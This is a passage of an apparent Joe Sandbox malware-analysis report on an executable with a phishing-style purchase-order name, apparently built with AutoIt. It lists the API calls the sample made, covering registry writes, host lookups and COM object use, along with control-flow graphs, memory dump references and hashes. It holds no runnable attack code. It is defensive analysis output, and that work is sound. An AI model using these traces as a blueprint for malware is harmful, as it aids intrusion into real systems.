                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EAE279
                                                                                                                                  • timeGetTime.WINMM ref: 00EAE51A
                                                                                                                                  • TranslateMessage.USER32(?), ref: 00EAE646
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00EAE651
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EAE664
                                                                                                                                  • LockWindowUpdate.USER32(00000000), ref: 00EAE697
                                                                                                                                  • DestroyWindow.USER32 ref: 00EAE6A3
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAE6BD
                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00F15B15
                                                                                                                                  • TranslateMessage.USER32(?), ref: 00F162AF
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00F162BD
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F162D1
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                  APIs
                                                                                                                                  • ___createFile.LIBCMT ref: 00ED6C73
                                                                                                                                  • ___createFile.LIBCMT ref: 00ED6CB4
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00ED6CDD
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00ED6CE4
                                                                                                                                  • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00ED6CF7
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00ED6D1A
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00ED6D23
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00ED6D2C
                                                                                                                                  • __set_osfhnd.LIBCMT ref: 00ED6D5C
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00ED6DC6
                                                                                                                                  • __close_nolock.LIBCMT ref: 00ED6DEC
                                                                                                                                  • __chsize_nolock.LIBCMT ref: 00ED6E1C
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00ED6E2E
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00ED6F26
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00ED6F3B
                                                                                                                                  • __close_nolock.LIBCMT ref: 00ED6F9B
                                                                                                                                    • Part of subcall function 00ECF84C: CloseHandle.KERNEL32(00000000,00F4EEC4,00000000,?,00ED6DF1,00F4EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ECF89C
                                                                                                                                    • Part of subcall function 00ECF84C: GetLastError.KERNEL32(?,00ED6DF1,00F4EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ECF8A6
                                                                                                                                    • Part of subcall function 00ECF84C: __free_osfhnd.LIBCMT ref: 00ECF8B3
                                                                                                                                    • Part of subcall function 00ECF84C: __dosmaperr.LIBCMT ref: 00ECF8D5
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00ED6FBD
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00ED70F2
                                                                                                                                  • ___createFile.LIBCMT ref: 00ED7111
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ED711E
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00ED7125
                                                                                                                                  • __free_osfhnd.LIBCMT ref: 00ED7145
                                                                                                                                  • __invoke_watson.LIBCMT ref: 00ED7173
                                                                                                                                  • __wsopen_helper.LIBCMT ref: 00ED718D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                  • String ID: 9A$@
                                                                                                                                  • API String ID: 3896587723-3249808769
                                                                                                                                  • Opcode ID: 6c62011464e4cad07b09adb4315b6f4b79e5634b77a11ad6ce85c428a686f41c
                                                                                                                                  • Instruction ID: 8e6743c1022ddd3ccc17ee8eff5226c2f44408b2356ceb4428e0852d0410e285
                                                                                                                                  • Opcode Fuzzy Hash: 6c62011464e4cad07b09adb4315b6f4b79e5634b77a11ad6ce85c428a686f41c
                                                                                                                                  • Instruction Fuzzy Hash: 3B2236719042099FEB289F68DD51BEE7B61EB00328F24622BE961BB3D2D7358D42D750

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00EE76ED
                                                                                                                                  • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00EE7713
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EE7741
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EE774C
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE7762
                                                                                                                                  • _wcsstr.LIBCMT ref: 00EE776D
                                                                                                                                  • 74D41560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00EE7789
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE77D2
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE77D9
                                                                                                                                  • _wcsncpy.LIBCMT ref: 00EE7804
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat$FileInfoVersion$D41560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                  • API String ID: 716990576-1459072770
                                                                                                                                  • Opcode ID: 32a5051925a2e26e8b17af08bc259901b469f20ea4430fefa48559ee0789a554
                                                                                                                                  • Instruction ID: 033c1401f98795619ee4a5350775d46087b94aaedbbf0207bbd168b49ca8d5e1
                                                                                                                                  • Opcode Fuzzy Hash: 32a5051925a2e26e8b17af08bc259901b469f20ea4430fefa48559ee0789a554
                                                                                                                                  • Instruction Fuzzy Hash: 3E415772904208BADB01A7649D47FBF77ECEF59360F14105EF901B6183EB75EA02D6A1

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • GetForegroundWindow.USER32 ref: 00EA1FBE
                                                                                                                                  • IsWindow.USER32(?), ref: 00F1282E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Foreground_memmove
                                                                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                  • API String ID: 3828923867-1919597938
                                                                                                                                  • Opcode ID: 44d3b2347f9ee98cf0434b240ccafd60ad8b1190ecc11a4dd3d16b8379a178f4
                                                                                                                                  • Instruction ID: 67061daa5994f8b222e825c8698df0e791c963f06d1f856b59959bec82c61fcd
                                                                                                                                  • Opcode Fuzzy Hash: 44d3b2347f9ee98cf0434b240ccafd60ad8b1190ecc11a4dd3d16b8379a178f4
                                                                                                                                  • Instruction Fuzzy Hash: 00D10E30504202DFCB48EF54C880ADAB7E1FF59360F145A1DF455675A2DB30F9AAEB92

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F03626
                                                                                                                                  • RegCreateKeyExW.KERNEL32(?,?,00000000,00F3DBF0,00000000,?,00000000,?,?), ref: 00F03694
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F036DC
                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F03765
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00F03A85
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F03A92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                                  • Opcode ID: 0db6f18d38c1f55a19f296034c20f563a12417f244f9720a050fc3761410f7d3
                                                                                                                                  • Instruction ID: d04f9da58f898b3f02872938b378c2e85e5b9819759f1a0df4075bb1f853f6d3
                                                                                                                                  • Opcode Fuzzy Hash: 0db6f18d38c1f55a19f296034c20f563a12417f244f9720a050fc3761410f7d3
                                                                                                                                  • Instruction Fuzzy Hash: 100258756006119FCB14EF24C995E2AB7E9FF89320F04845DF99AAB2A2DB34FD01DB41

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00000104,?,00000000,00000001,00000000), ref: 00EA428C
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                    • Part of subcall function 00EC1BC7: __wcsicmp_l.LIBCMT ref: 00EC1C50
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EA43C0
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00F1214E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe$CMDLINE$CMDLINERAW
                                                                                                                                  • API String ID: 861526374-4276960765
                                                                                                                                  • Opcode ID: 51cd8576eb7df9ed8f2c334259d15ab184f5b5cb4ce9f64d248234d2a3fe2942
                                                                                                                                  • Instruction ID: 1482936000288b49d3a0fc571ac35f3604306a2262e223301ec756dd5dc415a1
                                                                                                                                  • Opcode Fuzzy Hash: 51cd8576eb7df9ed8f2c334259d15ab184f5b5cb4ce9f64d248234d2a3fe2942
                                                                                                                                  • Instruction Fuzzy Hash: E2816372800119AACB05EBE0DD52EEFB7FCAF5A360F141019F551BB091EBA07B49DB61

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00EBEA39
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EBEA56
                                                                                                                                    • Part of subcall function 00EC297D: __wsplitpath_helper.LIBCMT ref: 00EC29BD
                                                                                                                                  • _wcsncat.LIBCMT ref: 00EBEA69
                                                                                                                                  • __makepath.LIBCMT ref: 00EBEA85
                                                                                                                                    • Part of subcall function 00EC2BFF: __wmakepath_s.LIBCMT ref: 00EC2C13
                                                                                                                                    • Part of subcall function 00EC010A: std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                    • Part of subcall function 00EC010A: __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EBEABE
                                                                                                                                    • Part of subcall function 00EBEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00EBEADA,?,?), ref: 00EBEB27
                                                                                                                                  • _wcscat.LIBCMT ref: 00F132FC
                                                                                                                                  • _wcscat.LIBCMT ref: 00F13334
                                                                                                                                  • _wcsncpy.LIBCMT ref: 00F13370
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                  • String ID: '/$Include$\
                                                                                                                                  • API String ID: 1213536620-683337311
                                                                                                                                  • Opcode ID: 9566ce6fd3929512a7361a716c26703a888a3a0074a1d1bd83d669a9ecccdbd4
                                                                                                                                  • Instruction ID: 96a0233b2055b66e8dbedd25460c6484311b9148f8995c3b65898c58de9af3a0
                                                                                                                                  • Opcode Fuzzy Hash: 9566ce6fd3929512a7361a716c26703a888a3a0074a1d1bd83d669a9ecccdbd4
                                                                                                                                  • Instruction Fuzzy Hash: 1C51DFB24047489BC354EF64ED92C9BB7E8FB4D300F40092EF56593261EBB49648EB66

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1143 ee78ee-ee7911 WSAStartup 1144 ee7917-ee7938 gethostname gethostbyname 1143->1144 1145 ee79b1-ee79bd call ec1943 1143->1145 1144->1145 1147 ee793a-ee7941 1144->1147 1154 ee79be-ee79c1 1145->1154 1148 ee794e-ee7950 1147->1148 1149 ee7943 1147->1149 1152 ee7952-ee795f call ec1943 1148->1152 1153 ee7961-ee79a6 call ebfaa0 inet_ntoa call ec3220 call ee8553 call ec1943 call ec017e 1148->1153 1151 ee7945-ee794c 1149->1151 1151->1148 1151->1151 1159 ee79a9-ee79af WSACleanup 1152->1159 1153->1159 1159->1154
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                  • API String ID: 208665112-3771769585
                                                                                                                                  • Opcode ID: ce201ec41064b95e8cb218bd6e35840ab78d631e69a9292f8ceb7d29aca6dc63
                                                                                                                                  • Instruction ID: 799eee68151437cba3196400bb493ad670467188d7d57ff8c088ca134234e258
                                                                                                                                  • Opcode Fuzzy Hash: ce201ec41064b95e8cb218bd6e35840ab78d631e69a9292f8ceb7d29aca6dc63
                                                                                                                                  • Instruction Fuzzy Hash: F011273190811DAFCB34A7719C45FDA77ACDF81720F1110A9F485B2092FF75DA8296A0

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00EA30B0
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00EA30BF
                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00EA30D5
                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00EA30E7
                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00EA30F9
                                                                                                                                    • Part of subcall function 00EA318A: LoadImageW.USER32(00EA0000,00000063,00000001,00000010,00000010,00000000), ref: 00EA31AE
                                                                                                                                  • RegisterClassExW.USER32(?), ref: 00EA3167
                                                                                                                                    • Part of subcall function 00EA2F58: GetSysColorBrush.USER32(0000000F), ref: 00EA2F8B
                                                                                                                                    • Part of subcall function 00EA2F58: RegisterClassExW.USER32(00000030), ref: 00EA2FB5
                                                                                                                                    • Part of subcall function 00EA2F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00EA2FC6
                                                                                                                                    • Part of subcall function 00EA2F58: LoadIconW.USER32(000000A9), ref: 00EA3009
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                  • API String ID: 2880975755-4155596026
                                                                                                                                  • Opcode ID: a12c3cb144254dfca356508638a95d93a40a7ccc9dfe0c4cc94433c006ad730c
                                                                                                                                  • Instruction ID: 4f55675c7983a269bb85ac86f6c4d8e09204cf517c15cbcf69632805bb99e37b
                                                                                                                                  • Opcode Fuzzy Hash: a12c3cb144254dfca356508638a95d93a40a7ccc9dfe0c4cc94433c006ad730c
                                                                                                                                  • Instruction Fuzzy Hash: 0C2171B0D0030CAFDB10DFA9EC0AA99BFF9FB49310F04412AE224E72A0D3B55540AF91

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1342 efb74b-efb7ac VariantInit call eaca8e CoInitialize 1345 efb7ae CoUninitialize 1342->1345 1346 efb7b4-efb7c7 call ebd5f6 1342->1346 1345->1346 1349 efb7c9-efb7d0 call eaca8e 1346->1349 1350 efb7d5-efb7dc 1346->1350 1349->1350 1351 efb7de-efb805 call ea84a6 call eda857 1350->1351 1352 efb81b-efb85b call ea84a6 call ebf885 1350->1352 1351->1352 1362 efb807-efb816 call efc235 1351->1362 1363 efb9d3-efba17 SetErrorMode CoGetInstanceFromFile 1352->1363 1364 efb861-efb86e 1352->1364 1381 efbad0-efbae3 VariantClear 1362->1381 1365 efba1f-efba3a CoGetObject 1363->1365 1366 efba19-efba1d 1363->1366 1368 efb8a8-efb8b6 GetRunningObjectTable 1364->1368 1369 efb870-efb881 call ebd5f6 1364->1369 1372 efba3c 1365->1372 1373 efbab5-efbac5 call efc235 SetErrorMode 1365->1373 1371 efba40-efba47 SetErrorMode 1366->1371 1375 efb8b8-efb8c9 1368->1375 1376 efb8d5-efb8e8 call efc235 1368->1376 1383 efb883-efb88d call eacdb4 1369->1383 1384 efb8a0 1369->1384 1380 efba4b-efba51 1371->1380 1372->1371 1389 efbac7-efbacb call ea5cd3 1373->1389 1393 efb8ed-efb8fc 1375->1393 1394 efb8cb-efb8d0 1375->1394 1376->1389 1386 efbaa8-efbaab 1380->1386 1387 efba53-efba55 1380->1387 1383->1384 1401 efb88f-efb89e call eacdb4 1383->1401 1384->1368 1386->1373 1391 efba8d-efbaa6 call eea6f6 1387->1391 1392 efba57-efba78 call edac4b 1387->1392 1389->1381 1391->1389 1392->1391 1404 efba7a-efba83 1392->1404 1400 efb907-efb91b 1393->1400 1394->1376 1407 efb9bb-efb9d1 1400->1407 1408 efb921-efb925 1400->1408 1401->1368 1404->1391 1407->1380 1408->1407 1410 efb92b-efb940 1408->1410 1414 efb9a2-efb9ac 1410->1414 1415 efb942-efb957 1410->1415 1414->1400 1415->1414 1418 efb959-efb983 call edac4b 1415->1418 1422 efb985-efb98d 1418->1422 1423 efb994-efb99e 1418->1423 1424 efb98f-efb990 1422->1424 1425 efb9b1-efb9b6 1422->1425 1423->1414 1424->1423 1425->1407
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EFB777
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00EFB7A4
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EFB7AE
                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00EFB8AE
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EFB9DB
                                                                                                                                  • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00EFBA0F
                                                                                                                                  • CoGetObject.OLE32(?,00000000,00F2D91C,?), ref: 00EFBA32
                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00EFBA45
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EFBAC5
                                                                                                                                  • VariantClear.OLEAUT32(00F2D91C), ref: 00EFBAD5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2395222682-0
                                                                                                                                  • Opcode ID: 6dc0678182293c917604c244841ccea436432112cf667a5ca777d98a69f06806
